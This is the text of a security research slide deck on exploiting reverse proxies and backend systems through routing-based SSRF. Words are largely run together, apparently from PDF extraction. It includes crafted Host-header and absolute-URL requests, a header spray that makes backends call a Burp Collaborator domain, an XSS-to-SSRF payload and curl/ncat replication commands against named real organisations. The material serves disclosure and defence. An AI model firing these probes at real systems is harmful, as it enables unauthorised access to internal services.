CRACKINGTHELENS

JamesKettle

EXPLOITINGHTTP'SHIDDENATTACK-SURFACE

AnUnexpectedPingback– cloud.mail.ru/imgur.com

Pingbackfrombn-proxy1a.ealing.ukcore.bt.net

predator.alien.bt.co.uk

cloud.mail.ru:80(HTTP) cloud.mail.ru:443(HTTPS)258bytes|52millis

Outline

• SpeculativeAttackPipeline•MisroutingRequests

• TargetingAuxiliarySystems

• Demo

• Q&A

Speculative AttackPipeline

• DNSListener• BurpCollaboratorClient•PrivateCollaboratorserverrecommended

• Rollyourown• Canarytokens

Listening

InvitingResponses

• Burpmatch/replace• Nocorrelation

• CollaboratorEverywhere• Masscan• NoHTTP/1.1orSSL/TLS

• ZMap/ZGrab

LazilyAssemblinganAudience

HackerOne BugCrowd

ScopeRegex 3millhosts

DNSDatabase

ProjectSonar

50kwebservers

ipaddress,hostname

Suitabletargetspreadsheet

Profit

MaximizingAttackSurface

GET / HTTP/1.1Host: {host1, host2, host3}X-Forwarded-Proto: {HTTPS, HTTP}Cache-Control: no-transformMax-Forwards: {1, 2, 3}

MisroutingRequests

REVERSEPROXY

PUBLICAPP

INTERNALAPP

MisroutingRequests

GET / HTTP/1.1Host: id.burpcollaborator.net

Exploited:• 27DoDservers• ats-vm.lorax.bf1.yahoo.com•MyISP• ColombianISPdoingDNSpoisoning

ats-vm.lorax.bf1.yahoo.com1/3

ats-vm.lorax.bf1.yahoo.com2/3

ats-vm.lorax.bf1.yahoo.com3/3

+15,000+5,000$20,000

• AllTCP/80traffictoblacklistedIPsgetsproxied• MasksallincomingBTtraffic

• /0traceroute(ttl=10)• Caches,self-hostedsites,speedtests,andblacklistedIPs

InvestigatingIntent- BT

GET/HTTP/1.1Host:www.icefilms.info

HTTP/1.1200OK…<p>Accesstothewebsiteslistedonthispagehasbeenblockedpursuanttoordersofthehighcourt.</p>

GEThttp://104.31.17.3/HTTP/1.1Host:www.icefilms.info

HTTP/1.1200OK…<title>IceFilms.info - QualityDivXMovies</title>

• vk.com pingbackfrom200.89.96.13

• DNSpoisoningimagehosts,socialnetworks

• andbbc.co.uk• Whicharticles?• Perspectives/Convergence• BackslashPoweredDiffing,ETag

InvestigatingIntent- METROTEL

"healthyinternet"

InputMangling

GET / HTTP/1.1Host: vcap.me

GET /vcap.me/vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net

GET / HTTP/1.1Host: ../?x=.vcap.me

GET /vcap.me/../?x=.vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net

+5,000$25,000

AbsoluteURLs

GET http://blah/ HTTP/1.1Host: one.mil

Ifyou'relookingatthisandarenotinthemilitaryorDoDthiswon'tmeananythingtoyou,norwillyoubeabletoaccessit….

Incapsula:hostname:ignoredPort

Backend:http://user:pass@hostname/

AmbiguousExploits- Incapsula

GET / HTTP/1.1Host: incap-client:80@internal.net

ApacheHttpComponents

Url backendURL = "http://backend-server/";String uri = ctx.getRequest().getRawUri();

URI proxyUri = new URIBuilder(uri).setHost(backendURL.getHost()).setPort(backendURL.getPort()) .build();

GET @burpcollab.net/ HTTP/1.1

http://backend-server@burpcollab.net/

GET @burpcollaborator.net/ HTTP/1.1

Service-Gateway-Is-Newrelic-Admin:false

+8,000$33,000

GlobaLeaks

GET xyz.burpcollaborator.net:80/ HTTP/1.1Host: demo.globaleaks.org

SSRFthroughTor

xYZ.BurpcoLLABoRaTOR.neT. from 89.234.157.254Xyz.burPColLABorAToR.nET. from 62.210.18.16xYz.burpColLaBorATOR.net. from 91.224.149.254

ExploitingAuxiliarySystems

PUBLICAPP BACKEND

ATTACKERAPP

"TheX-Wap-ProfileheadershouldcontainaURLpointingtoanXMLdocumentspecifyingthefeaturesofamobiledevice"

Decloaking BackendSystems

GET /?a=f.collab.net&a=f.collab.net HTTP/1.1Host: www.facebook.comX-WAP-Profile: http://a.collab.net/wap.xmlReferer: http://b.collab.net/refX-Forwarded-For: c.collab.netTrue-Client-IP: d.collab.netX-Real-IP: e.collab.netConnection: close

• URL&Redirecthandling• Auto-authentication- Responder.py• ClientHeartbleed– pacemaker.py

• TCP/IPfingerprinting– p0f• SSLciphers,certvalidation

ExploitingRemoteClients

• Pingbackinception• SprayRCEacrossLAN

• Whatifthey'rerendering?• SprayXSSacrossLAN- BlindReflectedServer-SideXSS(BRSSXSS)• XSS/proc/self/environ

• DotheysupportJavaScript?OrCSS?DotheyenforcetheSOP?CanImakepopups?WhataboutFlash?

ExploitingRemoteClients

RenderingEngineHackability Probe

JavaScriptenvironmentdifference:core,__core-js_shared__,System…

• Load<historyofblimps>

• NoteGET/blimps/F-1.pngHTTP/1.1

• Scanningresponseforresourceimports

Pre-emptiveCaching

GET / HTTP/1.1Host: burpcollaborator.net

GET /jquery.js HTTP/1.1GET /wildcat.jpg HTTP/1.1

https://www.history.navy.mil/our-collections/photography/numerical-list-of-images/nhhc-series/nh-series/NH-43000/NH-43487.html

EscalatingXSStoSSRF

REVERSEPROXY

PUBLICAPP

INTERNALAPP

EscalatingXSStoSSRF

ATTACKER PROXY PUBLICAPP INTERNALPOST /XSS.cgi

<img src="http://internal/index.php/a.jpg">

GET /index.php/a.jpg

Sensitive content

GET /index.php/a.jpgHost: internal

Sensitive content

DEMO

• Reverseproxiesaregoingtoproxy• UseaDMZ

• Crawlersareemployeeswithantiquatedbrowsers

• whoclickeverything

• Welcomeresearchers• Haveabugbounty• Don'tforbidautomatedtesting(withcustomtools)

Defense

Replicating

curl -H 'Host: internal' http://example.com/

echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n' | ncat example.com 80| openssl s_client -ign_eof -connect 7.7.7.7:443

openssl s_client -servername qq.com -ign_eof -connect 7.7.7.7:443

https://github.com/PortSwigger/collaborator-everywherehttps://github.com/PortSwigger/hackability

• ZGrab+Burp Collaboratorintegration

• X-WAP-Profile'sfriends

• Clientexploits

• Toolsforautomatedexploitation(especiallyblindSSRF)

• Untappedattacksurface• Theotherlayer

FurtherResearch

Bugbountiesenablewhitehat researchatscale

LoadbalancersareVPNsforthepublic

Crawlersareemployeeswhoclick

Takeaways

@albinowaxEmail:james.kettle@portswigger.net